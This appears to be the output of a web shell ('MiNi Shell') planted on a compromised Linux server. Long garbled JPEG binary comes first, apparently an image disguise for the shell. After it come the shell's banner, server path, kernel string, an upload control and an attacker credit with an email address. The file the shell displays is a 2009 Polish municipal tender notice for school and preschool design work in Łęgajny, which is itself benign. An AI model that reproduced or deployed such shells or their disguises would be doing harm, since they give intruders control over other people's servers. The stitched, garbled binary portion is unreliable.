JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090703/105125-N-2009.html

<p class="kh_header"><b>Barczewo: Wykonanie trzech koncepcji architektoniczno - budowlanych rozbudowy Zespołu Szkolno - Przedszkolnego w miejscowości Łęgajny (działka nr 471, obr. Łęgajny) wraz z dokumentacją projektowo - kosztorysową służącą zamawiającemu do ogłoszenia przetargu na wykonie ro-bót budowlanych wraz z nadzorem autorskim.</b><br>
<b>Numer ogłoszenia: 105125 - 2009; data zamieszczenia: 03.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Barczewo , Plac Ratuszowy 1, 11-010 Barczewo, tel. 089 5148664.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie trzech koncepcji architektoniczno - budowlanych rozbudowy Zespołu Szkolno - Przedszkolnego w miejscowości Łęgajny (działka nr 471, obr. Łęgajny) wraz z dokumentacją projektowo - kosztorysową służącą zamawiającemu do ogłoszenia przetargu na wykonie ro-bót budowlanych wraz z nadzorem autorskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: 
Wykonanie trzech koncepcji architektoniczno - budowlanych rozbudowy Zespołu Szkolno - Przed-szkolnego w miejscowości Łęgajny wraz z dokumentacją projektowo - kosztorysową służącą zamawia-jącemu do ogłoszenia przetargu na wykonie robót budowlanych wraz z nadzorem autorskim. Koncep-cje powinny obejmować rozbudowę istniejącej szkoły o pomieszczenia dydaktyczne i pomocnicze, budowę przedszkola wraz z zapleczem (kuchnią, placami zabaw itp.), budową sali sportowej do pro-wadzenia zajęć szkolnych wraz z boiskami pomocniczymi itp., zagospodarowaniem terenu i infrastruk-turą techniczną niezbędną do funkcjonowania Zespołu Szkolno - Przedszkolnego w Łęgajnach. 
2.    Zakres prac obejmuje:
opracowanie kompletnej dokumentacji projektowo-kosztorysowej dla robót budowlanych polegają-cych na rozbudowie Zespołu Szkolno - Przedszkolnego w miejscowości Łęgajny, gmina Barczewo.

Zakres rzeczowy:
a)	koncepcji projektowych -w terminie do 60 dni od daty podpisania niniejszej umowy wraz z uzgodnie-niem Wojewódzkiego Konserwatora Ochrony Zabytków w Olsztynie:
-koncepcja Nr 1 - rozbudowa szkoły o budynki parterowe, w których będą pomieszczenia szkolne, po      mieszczenia przedszkolne wraz z zapleczem i kuchnią, salą sportową na potrzeby szkoły podstawowej i   placem zabaw na potrzeby przedszkola, boiskami sportowymi, bieżnią i remoncie istniejącego budynku szkoły;
-koncepcja Nr 2 - rozbudowa szkoły o budynki parterowe i piętrowe, w których będą pomieszczenia szkol-ne, pomieszczenia przedszkolne wraz z zapleczem i kuchnią, salą sportową na potrzeby szkoły podsta-wowej i placem zabaw na potrzeby przedszkola, boiskami sportowymi, bieżnią i remoncie istniejącego; 
-koncepcja Nr 3 - propozycja ze strony projektanta wykonania budowy lub rozbudowy szkoły o budynki parterowe lub piętrowe, w których będą pomieszczenia szkolne, pomieszczenia przedszkolne wraz z zapleczem i kuchnią, salą sportową na potrzeby szkoły podstawowej i placem zabaw na potrzeby przedszko-la, boiskami sportowymi, bieżnią i remoncie istniejącego budynku na budowę nowego zespołu szkolno - przedszkolnego (z tym, że muszą być spełnione warunki funkcjonalno - użytkowe użytkownika).
W przypadku upływu powyższego terminu i niewykonania ww. opracowania zamawiający może odstąpić od niniejszej umowy zachowując prawo do naliczenia wykonawcy kary, w wysokości 5% wartości brutto umowy.
Dla Zatwierdzonej przez Zamawiającego Koncepcji:
b)kosztorysu inwestorskiego (sporządzonego metodą kalkulacji szczegółowej) w oparciu o rozporządze-nie Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosz-tów robót budowlanych określonych w programie funkcjonalno-użytkowym [Dz. U. z 2004r. Nr 130, poz. 1389] w liczbie - 1 egz. (także w wersji elektronicznej na płycie CD)
c)przedmiaru robót, przez który należy rozumieć opracowanie zawierające zestawienie przewidywanych do wykonania robót w kolejności technologicznej ich wykonania wraz ze szczegółowym opisem, miejscem wykonania lub wskazaniem podstaw ustalających szczegółowy opis, z wyliczeniem i zestawieniem liczby jednostek miar robót podstawowych oraz wskazaniem podstaw do ustalania cen jednostkowych robót lub jednostkowych nakładów rzeczowych. Przedmiar musi uwzględniać wymagania określone w rozporzą-dzeniu Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy doku-mentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (paragraf 6-10) - w liczbie 1 egz. (także w wersji elektronicznej na płycie CD)
d)projektów budowlanych (wielobranżowych, w tym technologiczny stołówki) wraz z niezbędnymi uzgod-nieniami (w tym ZUDP) umożliwiającymi uzyskanie pozwolenia na budowę, o którym mowa w ustawie Prawo budowlane i spełniającego wymagania rozporządzenia Ministra Infrastruktury  z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z dnia 10 marca 2003 r. Nr 120, poz 1133) w liczbie 5 egz. (także w wersji elektronicznej na płycie CD, format PDF pliki o maksymalnej objętości do 10 MB) wraz z pozwoleniem na budowę
e)specyfikacji technicznej wykonania i odbioru robót budowlanych, przez którą należy rozumieć opra-cowanie spełniające wymagania określone w §13 i 14 rozporządzenia Ministra Infrastruktury z dnia 
2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji tech-nicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego - w liczbie 
1 egz. (także w wersji elektronicznej na płycie CD)
f)informacji dotycząca bezpieczeństwa i ochrony zdrowia (BIOZ) - w liczbie 1 egz. (także w wersji elek-tronicznej na płycie CD)
g)opracowań wyjściowych niezbędnych do prawidłowego zaprojektowania przedmiotu zamówienia m.in. zaktualizowanych map do celów projektowych, dokumentacji geologicznej (jeśli potrzeba), decyzji środo-wiskowej oraz innych niezbędnych uzgodnień (Wojewódzki Konserwator Zabytków) i innych dokumentów
h)nadzór autorski.
3.  W koncepcji należy ująć potrzeby lokalowe i logistyczne planowanej inwestycji, które obejmują:
1)w związku z rozbudową przedszkola:
- 3 sale do zajęć dydaktycznych, każde z możliwością pomieszczenia 25 dzieci (wraz z niezbędnym zapleczem),
- kuchnia (warunkująca możliwość przygotowania pełnego wyżywienia),
- jadalnia (pozwalająca na korzystanie dzieciom w wieku przedszkolnym i szkolnym),
- rozwiązania projektowe powinny przewidywać ujęcie takich pomieszczeń jak pomieszczenia sanitar-nego, gospodarczego, 
-plac zabaw.
       2) w związku z rozbudową szkoły:
- 3 sale dydaktyczne oraz 2 sale z przeznaczeniem zabawowo - ruchowym do nauczania 
wczsnoszkolnego (wraz z zapleczem pomocniczym),
- 2 sale dydaktyczne dla klas IV - VI z zapleczem,
- 2 sale, w których będzie możliwość urządzenia biblioteki i czytelni,
- 1 sala jako pokój nauczycielski,
- 1 sala z przeznaczeniem na świetlice,
- 1 sala komputerowa 
- pomieszczenia sanitarne, gospodarcze, itp. (niezbędne do funkcjonowania szkoły).

3)Remont kapitalny wraz z modernizacją budynku istniejącego szkoły w oparciu o ustalenia robocze z Dyrektorem Zespołu Szkolno - Przedszkolnego w Łęgajnach. 

4)Budowa sali gimnastycznej na potrzeby szkoły: 
- sala do zajęć sportowych dla dzieci 
(wielofunkcyjne o wymiarach boiska sportowego do gry w koszykówkę)
    - sala do ćwiczeń ruchowych,
    - zaplecze socjalne niezbędne do funkcjonowania sali 
    (wraz z WC oraz pomieszczeniami pomocniczymi itp.)

5)Budowa boisk sportowych zewnętrznych:
   - boisko sportowe do zajęć lekcyjnych (piłka siatkowa, piłka ręczna, skocznia w dal itp.).

6)Budowa parkingów, miejsc parkingowych i dojazdów gimbusów.

7)Wykonanie projektu umożliwiającego etapowanie wykonywania inwestycji, w taki sposób aby szkoła działała nieprzerwanie.
  
Wybrany wykonawca po wykonaniu przedmiotu zamówienia przeniesie prawa dokonywania zmian w pro-jektach na zamawiającego.

Wykonawca zobowiązany jest do pełnienia nadzoru autorskiego zgodnie z określonym w ofercie wynagro-dzeniem w drodze odrębnej umowy z Zamawiającym.

Przed złożeniem oferty wymagana jest wizja w terenie i w razie powstania jakichkolwiek wątpliwości, złożenie pisemnego zapytania w trybie art. 38 ust.1 uPzp..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości: 6 000,00 PLN (słownie: sześć tysięcy), kasa Urzędu Miasta nie przyjmuje wpłat.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział  Wykonawcy, którzy spełniają następujące warunki: 
1. 1)	posiadają uprawnienia wymagane ustawami, do wykonywania działalności i czynności w zakresie przedmiotu niniejszego zamówienia;
1. 2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponujemy potencjałem technicznym i osobami  zdolnymi do wykonania niniejszego zamówienia;
1. 3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia;
1. 4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
2. Opis sposobu dokonania oceny spełnienia warunków udziału w przetargu:
2.0) Uprawnienia.
Wykonawca musi wykazać że posiada wymagane uprawnienia do wykonywania działalności i czynności w zakresie wykonania przedmiotu zamówienia tzn., że profil wykonywanej przez niego działalności umożliwia jego prawidłowe wykonanie. Wymagane jest załączenie aktualnego odpisu z właściwego rejestru albo aktual-nego zaświadczenia o wpisie do ewidencji działalności gospodarczej [załącznik do oferty].
2.1) Potencjał kadrowy.
Wykonawca wskaże [załącznik Nr 5 do siwz] do wykonania niniejszego zamówienia obowiązkowo zespół Projektowy, którego członkowie posiadają właściwe uprawnienia zawodowe do wykonania niniejszego zamó-wienia oraz każdy z członków przynależeć do właściwej terytorialnie Izby Samorządu Zawodowego.
2.2) Doświadczenie.
Wykonawca musi wykazać [załącznik Nr 4 do siwz], że w ciągu ostatnich 3 lat przed dniem wszczęcia po-stępowania, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał co najmniej 2 roboty projektowe odpowiadające swoim rodzajem (budowa, przebudowa, rozbudowa) i wartością na łączną kwotę minimum 500 000,00 zł. brutto.
2.3) Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt. X.3. przedmiotowego postępowania oświadczeń i dokumentów, wg. formuły spełnia-nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 3. Dokumenty wymagane (obowiązkowo) od Wykonawcy w przedmiotowym postępowaniu.
3.1) Wraz z ofertą wypełnioną na formularzu ofertowo-cenowym,(obowiązkowo) należy złożyć: 
1.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności go-spodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; w celu po-twierdzenia, że profil wykonywanej przez niego działalności umożliwia prawidłowe wykonanie zamówienia [załącznik do oferty].
2.  Wypełniony formularz ofertowo-cenowy [załącznik Nr 2 do siwz].
3.  Podpisany (lub parafowany w przypadku posiadania pieczątki imiennej) i opieczętowany na ostatniej stronie projekt umowy [załącznik Nr 1 do siwz].
4.  Informację o osobach, które będą skierowane do wykonania zamówienia (Potencjał kadrowy) - [załącznik Nr 5 do siwz], z załączonym odpisem nadanych uprawnień zawodowych i zaświadczeniem o przynależ-ności do właściwej terytorialnie Izby Inżynierów Budownictwa (dotyczy Zespołu Projektowego), a w przy-padku osób które uzyskały uprawnienia budowlane po dniu 1.01.1995r. - wypis z centralnego rejestru osób uprawnionych, potwierdzonego przez GINB. 
5.  Informację o doświadczeniu zawodowym Wykonawcy (Doświadczenie) - [załącznik Nr 4 do siwz], z załączeniem dokumentu/dokumentów potwierdzających, że wymienione w informacji minimum 2 roboty projektowe w zakresie budowy, przebudowy, rozbudowy zostały wykonane należycie (np. referencje).
6.  Oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania o udzielenie niniejszego zamówie-nia, na podstawie art. 24 ust.1 i ust.2 [ustawy Pzp], oraz o spełnieniu warunków określonych w art. 22 ust.1-3 [ustawy Pzp] - [załącznik Nr 3 do siwz].
7.    Pełnomocnictwo do reprezentowania o ile ofertę składa pełnomocnik.
Wykonawca ma obowiązek załączenia do oferty oryginału dokumentu pełnomocnictwa lub jego kopii poświadczonej notarialnie.
8.    Dowód wniesienia wadium [załącznik do oferty].  
Ponieważ Zamawiający ustalił formę wynagrodzenia Wykonawcy jako ryczałt, nie żąda złożenia razem z ofertą kosztorysu ofertowego. 
3.2) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, za-miast dokumentów, o których mowa w pkt. X. ppkt. 3.1) 1. składa odpowiedni dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, oraz nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
3.3)  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamiesz-kania, nie wydaje się dokumentów, o którym mowa w pkt. X. 3.2) zastępuje się je dokumentem zawiera-jącym oświadczenie złożone przed notariuszem, lub właściwym organem sądowym, lub administracyj-nym albo organem samorządu zawodowego lub gospodarczego odpowiednio do kraju pochodzenia oso-by lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty sporządzane w języku obcym są składane wraz z tłumaczeniem na język polski i poświad-czone przez Wykonawcę.
3.4)  Dokumenty wymagane w przypadku składania oferty wspólnej.
1.W przypadku składania oferty przez podmioty występujące wspólnie (konsorcjum) Wykonawcy ustanawia-ją pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. Wówczas podmioty zobowiązane są do złożenia wraz z ofertą sto-sownego pełnomocnictwa do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
2.   Wymagane dokumenty i oświadczenia wskazane w pkt. X. 3.1) 1-3 składa każdy podmiot bądź osoba.
3.  Wszelka korespondencja oraz rozliczenia prowadzone będą wyłącznie z Pełnomocnikiem konsorcjum. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich partnerów, z załączeniem pełnomocnictwa do reprezentowania konsorcjum przez Pełnomocnika.
Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę; nie dotyczy dokumentu pełnomocnictwa (patrz pkt.X.3, 3.1) 
Nr 6..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.barczewo.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD MIEJSKI    
Plac Ratuszowy 1 
11-010 Barczewo.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.07.2009 godzina 10:00, miejsce: URZĄD MIEJSKI    
Plac Ratuszowy 1 
11-010 Barczewo.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com